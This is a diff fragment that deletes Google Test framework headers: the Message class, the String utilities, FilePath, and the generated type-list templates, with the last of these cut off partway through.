-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines the Message class.
-//
-// IMPORTANT NOTE: Due to limitation of the C++ language, we have to
-// leave some internal implementation details in this header file.
-// They are clearly marked by comments like this:
-//
-//   // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-//
-// Such code is NOT meant to be used by a user directly, and is subject
-// to CHANGE WITHOUT NOTICE.  Therefore DO NOT DEPEND ON IT in a user
-// program!
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_MESSAGE_H_
-#define GTEST_INCLUDE_GTEST_GTEST_MESSAGE_H_
-
-#include <limits>
-
-
-// Ensures that there is at least one operator<< in the global namespace.
-// See Message& operator<<(...) below for why.
-void operator<<(const testing::internal::Secret&, int);
-
-namespace testing {
-
-// The Message class works like an ostream repeater.
-//
-// Typical usage:
-//
-//   1. You stream a bunch of values to a Message object.
-//      It will remember the text in a stringstream.
-//   2. Then you stream the Message object to an ostream.
-//      This causes the text in the Message to be streamed
-//      to the ostream.
-//
-// For example;
-//
-//   testing::Message foo;
-//   foo << 1 << " != " << 2;
-//   std::cout << foo;
-//
-// will print "1 != 2".
-//
-// Message is not intended to be inherited from.  In particular, its
-// destructor is not virtual.
-//
-// Note that stringstream behaves differently in gcc and in MSVC.  You
-// can stream a NULL char pointer to it in the former, but not in the
-// latter (it causes an access violation if you do).  The Message
-// class hides this difference by treating a NULL char pointer as
-// "(null)".
-class GTEST_API_ Message {
- private:
-  // The type of basic IO manipulators (endl, ends, and flush) for
-  // narrow streams.
-  typedef std::ostream& (*BasicNarrowIoManip)(std::ostream&);
-
- public:
-  // Constructs an empty Message.
-  Message();
-
-  // Copy constructor.
-  Message(const Message& msg) : ss_(new ::std::stringstream) {  // NOLINT
-    *ss_ << msg.GetString();
-  }
-
-  // Constructs a Message from a C-string.
-  explicit Message(const char* str) : ss_(new ::std::stringstream) {
-    *ss_ << str;
-  }
-
-#if GTEST_OS_SYMBIAN
-  // Streams a value (either a pointer or not) to this object.
-  template <typename T>
-  inline Message& operator <<(const T& value) {
-    StreamHelper(typename internal::is_pointer<T>::type(), value);
-    return *this;
-  }
-#else
-  // Streams a non-pointer value to this object.
-  template <typename T>
-  inline Message& operator <<(const T& val) {
-    // Some libraries overload << for STL containers.  These
-    // overloads are defined in the global namespace instead of ::std.
-    //
-    // C++'s symbol lookup rule (i.e. Koenig lookup) says that these
-    // overloads are visible in either the std namespace or the global
-    // namespace, but not other namespaces, including the testing
-    // namespace which Google Test's Message class is in.
-    //
-    // To allow STL containers (and other types that has a << operator
-    // defined in the global namespace) to be used in Google Test
-    // assertions, testing::Message must access the custom << operator
-    // from the global namespace.  With this using declaration,
-    // overloads of << defined in the global namespace and those
-    // visible via Koenig lookup are both exposed in this function.
-    using ::operator <<;
-    *ss_ << val;
-    return *this;
-  }
-
-  // Streams a pointer value to this object.
-  //
-  // This function is an overload of the previous one.  When you
-  // stream a pointer to a Message, this definition will be used as it
-  // is more specialized.  (The C++ Standard, section
-  // [temp.func.order].)  If you stream a non-pointer, then the
-  // previous definition will be used.
-  //
-  // The reason for this overload is that streaming a NULL pointer to
-  // ostream is undefined behavior.  Depending on the compiler, you
-  // may get "0", "(nil)", "(null)", or an access violation.  To
-  // ensure consistent result across compilers, we always treat NULL
-  // as "(null)".
-  template <typename T>
-  inline Message& operator <<(T* const& pointer) {  // NOLINT
-    if (pointer == NULL) {
-      *ss_ << "(null)";
-    } else {
-      *ss_ << pointer;
-    }
-    return *this;
-  }
-#endif  // GTEST_OS_SYMBIAN
-
-  // Since the basic IO manipulators are overloaded for both narrow
-  // and wide streams, we have to provide this specialized definition
-  // of operator <<, even though its body is the same as the
-  // templatized version above.  Without this definition, streaming
-  // endl or other basic IO manipulators to Message will confuse the
-  // compiler.
-  Message& operator <<(BasicNarrowIoManip val) {
-    *ss_ << val;
-    return *this;
-  }
-
-  // Instead of 1/0, we want to see true/false for bool values.
-  Message& operator <<(bool b) {
-    return *this << (b ? "true" : "false");
-  }
-
-  // These two overloads allow streaming a wide C string to a Message
-  // using the UTF-8 encoding.
-  Message& operator <<(const wchar_t* wide_c_str);
-  Message& operator <<(wchar_t* wide_c_str);
-
-#if GTEST_HAS_STD_WSTRING
-  // Converts the given wide string to a narrow string using the UTF-8
-  // encoding, and streams the result to this Message object.
-  Message& operator <<(const ::std::wstring& wstr);
-#endif  // GTEST_HAS_STD_WSTRING
-
-#if GTEST_HAS_GLOBAL_WSTRING
-  // Converts the given wide string to a narrow string using the UTF-8
-  // encoding, and streams the result to this Message object.
-  Message& operator <<(const ::wstring& wstr);
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-  // Gets the text streamed to this object so far as an std::string.
-  // Each '\0' character in the buffer is replaced with "\\0".
-  //
-  // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-  std::string GetString() const;
-
- private:
-
-#if GTEST_OS_SYMBIAN
-  // These are needed as the Nokia Symbian Compiler cannot decide between
-  // const T& and const T* in a function template. The Nokia compiler _can_
-  // decide between class template specializations for T and T*, so a
-  // tr1::type_traits-like is_pointer works, and we can overload on that.
-  template <typename T>
-  inline void StreamHelper(internal::true_type /*is_pointer*/, T* pointer) {
-    if (pointer == NULL) {
-      *ss_ << "(null)";
-    } else {
-      *ss_ << pointer;
-    }
-  }
-  template <typename T>
-  inline void StreamHelper(internal::false_type /*is_pointer*/,
-                           const T& value) {
-    // See the comments in Message& operator <<(const T&) above for why
-    // we need this using statement.
-    using ::operator <<;
-    *ss_ << value;
-  }
-#endif  // GTEST_OS_SYMBIAN
-
-  // We'll hold the text streamed to this object here.
-  const internal::scoped_ptr< ::std::stringstream> ss_;
-
-  // We declare (but don't implement) this to prevent the compiler
-  // from implementing the assignment operator.
-  void operator=(const Message&);
-};
-
-// Streams a Message to an ostream.
-inline std::ostream& operator <<(std::ostream& os, const Message& sb) {
-  return os << sb.GetString();
-}
-
-namespace internal {
-
-// Converts a streamable value to an std::string.  A NULL pointer is
-// converted to "(null)".  When the input value is a ::string,
-// ::std::string, ::wstring, or ::std::wstring object, each NUL
-// character in it is replaced with "\\0".
-template <typename T>
-std::string StreamableToString(const T& streamable) {
-  return (Message() << streamable).GetString();
-}
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_MESSAGE_H_
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan), eefacm@gmail.com (Sean Mcafee)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file declares the String class and functions used internally by
-// Google Test.  They are subject to change without notice. They should not used
-// by code external to Google Test.
-//
-// This header file is #included by <gtest/internal/gtest-internal.h>.
-// It should not be #included by other files.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_STRING_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_STRING_H_
-
-#ifdef __BORLANDC__
-// string.h is not guaranteed to provide strcpy on C++ Builder.
-# include <mem.h>
-#endif
-
-#include <string.h>
-#include <string>
-
-
-namespace testing {
-namespace internal {
-
-// String - an abstract class holding static string utilities.
-class GTEST_API_ String {
- public:
-  // Static utility methods
-
-  // Clones a 0-terminated C string, allocating memory using new.  The
-  // caller is responsible for deleting the return value using
-  // delete[].  Returns the cloned string, or NULL if the input is
-  // NULL.
-  //
-  // This is different from strdup() in string.h, which allocates
-  // memory using malloc().
-  static const char* CloneCString(const char* c_str);
-
-#if GTEST_OS_WINDOWS_MOBILE
-  // Windows CE does not have the 'ANSI' versions of Win32 APIs. To be
-  // able to pass strings to Win32 APIs on CE we need to convert them
-  // to 'Unicode', UTF-16.
-
-  // Creates a UTF-16 wide string from the given ANSI string, allocating
-  // memory using new. The caller is responsible for deleting the return
-  // value using delete[]. Returns the wide string, or NULL if the
-  // input is NULL.
-  //
-  // The wide string is created using the ANSI codepage (CP_ACP) to
-  // match the behaviour of the ANSI versions of Win32 calls and the
-  // C runtime.
-  static LPCWSTR AnsiToUtf16(const char* c_str);
-
-  // Creates an ANSI string from the given wide string, allocating
-  // memory using new. The caller is responsible for deleting the return
-  // value using delete[]. Returns the ANSI string, or NULL if the
-  // input is NULL.
-  //
-  // The returned string is created using the ANSI codepage (CP_ACP) to
-  // match the behaviour of the ANSI versions of Win32 calls and the
-  // C runtime.
-  static const char* Utf16ToAnsi(LPCWSTR utf16_str);
-#endif
-
-  // Compares two C strings.  Returns true iff they have the same content.
-  //
-  // Unlike strcmp(), this function can handle NULL argument(s).  A
-  // NULL C string is considered different to any non-NULL C string,
-  // including the empty string.
-  static bool CStringEquals(const char* lhs, const char* rhs);
-
-  // Converts a wide C string to a String using the UTF-8 encoding.
-  // NULL will be converted to "(null)".  If an error occurred during
-  // the conversion, "(failed to convert from wide string)" is
-  // returned.
-  static std::string ShowWideCString(const wchar_t* wide_c_str);
-
-  // Compares two wide C strings.  Returns true iff they have the same
-  // content.
-  //
-  // Unlike wcscmp(), this function can handle NULL argument(s).  A
-  // NULL C string is considered different to any non-NULL C string,
-  // including the empty string.
-  static bool WideCStringEquals(const wchar_t* lhs, const wchar_t* rhs);
-
-  // Compares two C strings, ignoring case.  Returns true iff they
-  // have the same content.
-  //
-  // Unlike strcasecmp(), this function can handle NULL argument(s).
-  // A NULL C string is considered different to any non-NULL C string,
-  // including the empty string.
-  static bool CaseInsensitiveCStringEquals(const char* lhs,
-                                           const char* rhs);
-
-  // Compares two wide C strings, ignoring case.  Returns true iff they
-  // have the same content.
-  //
-  // Unlike wcscasecmp(), this function can handle NULL argument(s).
-  // A NULL C string is considered different to any non-NULL wide C string,
-  // including the empty string.
-  // NB: The implementations on different platforms slightly differ.
-  // On windows, this method uses _wcsicmp which compares according to LC_CTYPE
-  // environment variable. On GNU platform this method uses wcscasecmp
-  // which compares according to LC_CTYPE category of the current locale.
-  // On MacOS X, it uses towlower, which also uses LC_CTYPE category of the
-  // current locale.
-  static bool CaseInsensitiveWideCStringEquals(const wchar_t* lhs,
-                                               const wchar_t* rhs);
-
-  // Returns true iff the given string ends with the given suffix, ignoring
-  // case. Any string is considered to end with an empty suffix.
-  static bool EndsWithCaseInsensitive(
-      const std::string& str, const std::string& suffix);
-
-  // Formats an int value as "%02d".
-  static std::string FormatIntWidth2(int value);  // "%02d" for width == 2
-
-  // Formats an int value as "%X".
-  static std::string FormatHexInt(int value);
-
-  // Formats a byte as "%02X".
-  static std::string FormatByte(unsigned char value);
-
- private:
-  String();  // Not meant to be instantiated.
-};  // class String
-
-// Gets the content of the stringstream's buffer as an std::string.  Each '\0'
-// character in the buffer is replaced with "\\0".
-GTEST_API_ std::string StringStreamToString(::std::stringstream* stream);
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_STRING_H_
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: keith.ray@gmail.com (Keith Ray)
-//
-// Google Test filepath utilities
-//
-// This header file declares classes and functions used internally by
-// Google Test.  They are subject to change without notice.
-//
-// This file is #included in <gtest/internal/gtest-internal.h>.
-// Do not include this header file separately!
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_FILEPATH_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_FILEPATH_H_
-
-
-namespace testing {
-namespace internal {
-
-// FilePath - a class for file and directory pathname manipulation which
-// handles platform-specific conventions (like the pathname separator).
-// Used for helper functions for naming files in a directory for xml output.
-// Except for Set methods, all methods are const or static, which provides an
-// "immutable value object" -- useful for peace of mind.
-// A FilePath with a value ending in a path separator ("like/this/") represents
-// a directory, otherwise it is assumed to represent a file. In either case,
-// it may or may not represent an actual file or directory in the file system.
-// Names are NOT checked for syntax correctness -- no checking for illegal
-// characters, malformed paths, etc.
-
-class GTEST_API_ FilePath {
- public:
-  FilePath() : pathname_("") { }
-  FilePath(const FilePath& rhs) : pathname_(rhs.pathname_) { }
-
-  explicit FilePath(const std::string& pathname) : pathname_(pathname) {
-    Normalize();
-  }
-
-  FilePath& operator=(const FilePath& rhs) {
-    Set(rhs);
-    return *this;
-  }
-
-  void Set(const FilePath& rhs) {
-    pathname_ = rhs.pathname_;
-  }
-
-  const std::string& string() const { return pathname_; }
-  const char* c_str() const { return pathname_.c_str(); }
-
-  // Returns the current working directory, or "" if unsuccessful.
-  static FilePath GetCurrentDir();
-
-  // Given directory = "dir", base_name = "test", number = 0,
-  // extension = "xml", returns "dir/test.xml". If number is greater
-  // than zero (e.g., 12), returns "dir/test_12.xml".
-  // On Windows platform, uses \ as the separator rather than /.
-  static FilePath MakeFileName(const FilePath& directory,
-                               const FilePath& base_name,
-                               int number,
-                               const char* extension);
-
-  // Given directory = "dir", relative_path = "test.xml",
-  // returns "dir/test.xml".
-  // On Windows, uses \ as the separator rather than /.
-  static FilePath ConcatPaths(const FilePath& directory,
-                              const FilePath& relative_path);
-
-  // Returns a pathname for a file that does not currently exist. The pathname
-  // will be directory/base_name.extension or
-  // directory/base_name_<number>.extension if directory/base_name.extension
-  // already exists. The number will be incremented until a pathname is found
-  // that does not already exist.
-  // Examples: 'dir/foo_test.xml' or 'dir/foo_test_1.xml'.
-  // There could be a race condition if two or more processes are calling this
-  // function at the same time -- they could both pick the same filename.
-  static FilePath GenerateUniqueFileName(const FilePath& directory,
-                                         const FilePath& base_name,
-                                         const char* extension);
-
-  // Returns true iff the path is "".
-  bool IsEmpty() const { return pathname_.empty(); }
-
-  // If input name has a trailing separator character, removes it and returns
-  // the name, otherwise return the name string unmodified.
-  // On Windows platform, uses \ as the separator, other platforms use /.
-  FilePath RemoveTrailingPathSeparator() const;
-
-  // Returns a copy of the FilePath with the directory part removed.
-  // Example: FilePath("path/to/file").RemoveDirectoryName() returns
-  // FilePath("file"). If there is no directory part ("just_a_file"), it returns
-  // the FilePath unmodified. If there is no file part ("just_a_dir/") it
-  // returns an empty FilePath ("").
-  // On Windows platform, '\' is the path separator, otherwise it is '/'.
-  FilePath RemoveDirectoryName() const;
-
-  // RemoveFileName returns the directory path with the filename removed.
-  // Example: FilePath("path/to/file").RemoveFileName() returns "path/to/".
-  // If the FilePath is "a_file" or "/a_file", RemoveFileName returns
-  // FilePath("./") or, on Windows, FilePath(".\\"). If the filepath does
-  // not have a file, like "just/a/dir/", it returns the FilePath unmodified.
-  // On Windows platform, '\' is the path separator, otherwise it is '/'.
-  FilePath RemoveFileName() const;
-
-  // Returns a copy of the FilePath with the case-insensitive extension removed.
-  // Example: FilePath("dir/file.exe").RemoveExtension("EXE") returns
-  // FilePath("dir/file"). If a case-insensitive extension is not
-  // found, returns a copy of the original FilePath.
-  FilePath RemoveExtension(const char* extension) const;
-
-  // Creates directories so that path exists. Returns true if successful or if
-  // the directories already exist; returns false if unable to create
-  // directories for any reason. Will also return false if the FilePath does
-  // not represent a directory (that is, it doesn't end with a path separator).
-  bool CreateDirectoriesRecursively() const;
-
-  // Create the directory so that path exists. Returns true if successful or
-  // if the directory already exists; returns false if unable to create the
-  // directory for any reason, including if the parent directory does not
-  // exist. Not named "CreateDirectory" because that's a macro on Windows.
-  bool CreateFolder() const;
-
-  // Returns true if FilePath describes something in the file-system,
-  // either a file, directory, or whatever, and that something exists.
-  bool FileOrDirectoryExists() const;
-
-  // Returns true if pathname describes a directory in the file-system
-  // that exists.
-  bool DirectoryExists() const;
-
-  // Returns true if FilePath ends with a path separator, which indicates that
-  // it is intended to represent a directory. Returns false otherwise.
-  // This does NOT check that a directory (or file) actually exists.
-  bool IsDirectory() const;
-
-  // Returns true if pathname describes a root directory. (Windows has one
-  // root directory per disk drive.)
-  bool IsRootDirectory() const;
-
-  // Returns true if pathname describes an absolute path.
-  bool IsAbsolutePath() const;
-
- private:
-  // Replaces multiple consecutive separators with a single separator.
-  // For example, "bar///foo" becomes "bar/foo". Does not eliminate other
-  // redundancies that might be in a pathname involving "." or "..".
-  //
-  // A pathname with multiple consecutive separators may occur either through
-  // user error or as a result of some scripts or APIs that generate a pathname
-  // with a trailing separator. On other platforms the same API or script
-  // may NOT generate a pathname with a trailing "/". Then elsewhere that
-  // pathname may have another "/" and pathname components added to it,
-  // without checking for the separator already being there.
-  // The script language and operating system may allow paths like "foo//bar"
-  // but some of the functions in FilePath will not handle that correctly. In
-  // particular, RemoveTrailingPathSeparator() only removes one separator, and
-  // it is called in CreateDirectoriesRecursively() assuming that it will change
-  // a pathname from directory syntax (trailing separator) to filename syntax.
-  //
-  // On Windows this method also replaces the alternate path separator '/' with
-  // the primary path separator '\\', so that for example "bar\\/\\foo" becomes
-  // "bar\\foo".
-
-  void Normalize();
-
-  // Returns a pointer to the last occurence of a valid path separator in
-  // the FilePath. On Windows, for example, both '/' and '\' are valid path
-  // separators. Returns NULL if no path separator was found.
-  const char* FindLastPathSeparator() const;
-
-  std::string pathname_;
-};  // class FilePath
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_FILEPATH_H_
-// This file was GENERATED by command:
-//     pump.py gtest-type-util.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Type utilities needed for implementing typed and type-parameterized
-// tests.  This file is generated by a SCRIPT.  DO NOT EDIT BY HAND!
-//
-// Currently we support at most 50 types in a list, and at most 50
-// type-parameterized tests in one type-parameterized test case.
-// Please contact googletestframework@googlegroups.com if you need
-// more.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TYPE_UTIL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TYPE_UTIL_H_
-
-
-// #ifdef __GNUC__ is too general here.  It is possible to use gcc without using
-// libstdc++ (which is where cxxabi.h comes from).
-# if GTEST_HAS_CXXABI_H_
-#  include <cxxabi.h>
-# elif defined(__HP_aCC)
-#  include <acxx_demangle.h>
-# endif  // GTEST_HASH_CXXABI_H_
-
-namespace testing {
-namespace internal {
-
-// GetTypeName<T>() returns a human-readable name of type T.
-// NB: This function is also used in Google Mock, so don't move it inside of
-// the typed-test-only section below.
-template <typename T>
-std::string GetTypeName() {
-# if GTEST_HAS_RTTI
-
-  const char* const name = typeid(T).name();
-#  if GTEST_HAS_CXXABI_H_ || defined(__HP_aCC)
-  int status = 0;
-  // gcc's implementation of typeid(T).name() mangles the type name,
-  // so we have to demangle it.
-#   if GTEST_HAS_CXXABI_H_
-  using abi::__cxa_demangle;
-#   endif  // GTEST_HAS_CXXABI_H_
-  char* const readable_name = __cxa_demangle(name, 0, 0, &status);
-  const std::string name_str(status == 0 ? readable_name : name);
-  free(readable_name);
-  return name_str;
-#  else
-  return name;
-#  endif  // GTEST_HAS_CXXABI_H_ || __HP_aCC
-
-# else
-
-  return "<type>";
-
-# endif  // GTEST_HAS_RTTI
-}
-
-#if GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-// AssertyTypeEq<T1, T2>::type is defined iff T1 and T2 are the same
-// type.  This can be used as a compile-time assertion to ensure that
-// two types are equal.
-
-template <typename T1, typename T2>
-struct AssertTypeEq;
-
-template <typename T>
-struct AssertTypeEq<T, T> {
-  typedef bool type;
-};
-
-// A unique type used as the default value for the arguments of class
-// template Types.  This allows us to simulate variadic templates
-// (e.g. Types<int>, Type<int, double>, and etc), which C++ doesn't
-// support directly.
-struct None {};
-
-// The following family of struct and struct templates are used to
-// represent type lists.  In particular, TypesN<T1, T2, ..., TN>
-// represents a type list with N types (T1, T2, ..., and TN) in it.
-// Except for Types0, every struct in the family has two member types:
-// Head for the first type in the list, and Tail for the rest of the
-// list.
-
-// The empty type list.
-struct Types0 {};
-
-// Type lists of length 1, 2, 3, and so on.
-
-template <typename T1>
-struct Types1 {
-  typedef T1 Head;
-  typedef Types0 Tail;
-};
-template <typename T1, typename T2>
-struct Types2 {
-  typedef T1 Head;
-  typedef Types1<T2> Tail;
-};
-
-template <typename T1, typename T2, typename T3>
-struct Types3 {
-  typedef T1 Head;
-  typedef Types2<T2, T3> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4>
-struct Types4 {
-  typedef T1 Head;
-  typedef Types3<T2, T3, T4> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-struct Types5 {
-  typedef T1 Head;
-  typedef Types4<T2, T3, T4, T5> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-struct Types6 {
-  typedef T1 Head;
-  typedef Types5<T2, T3, T4, T5, T6> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-struct Types7 {
-  typedef T1 Head;
-  typedef Types6<T2, T3, T4, T5, T6, T7> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-struct Types8 {
-  typedef T1 Head;
-  typedef Types7<T2, T3, T4, T5, T6, T7, T8> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-struct Types9 {
-  typedef T1 Head;
-  typedef Types8<T2, T3, T4, T5, T6, T7, T8, T9> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-struct Types10 {
-  typedef T1 Head;
-  typedef Types9<T2, T3, T4, T5, T6, T7, T8, T9, T10> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-struct Types11 {
-  typedef T1 Head;
-  typedef Types10<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-struct Types12 {
-  typedef T1 Head;
-  typedef Types11<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-struct Types13 {
-  typedef T1 Head;
-  typedef Types12<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14>
-struct Types14 {
-  typedef T1 Head;
-  typedef Types13<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15>
-struct Types15 {
-  typedef T1 Head;
-  typedef Types14<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-struct Types16 {
-  typedef T1 Head;
-  typedef Types15<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-struct Types17 {
-  typedef T1 Head;
-  typedef Types16<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-struct Types18 {
-  typedef T1 Head;
-  typedef Types17<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-struct Types19 {
-  typedef T1 Head;
-  typedef Types18<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-struct Types20 {
-  typedef T1 Head;
-  typedef Types19<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
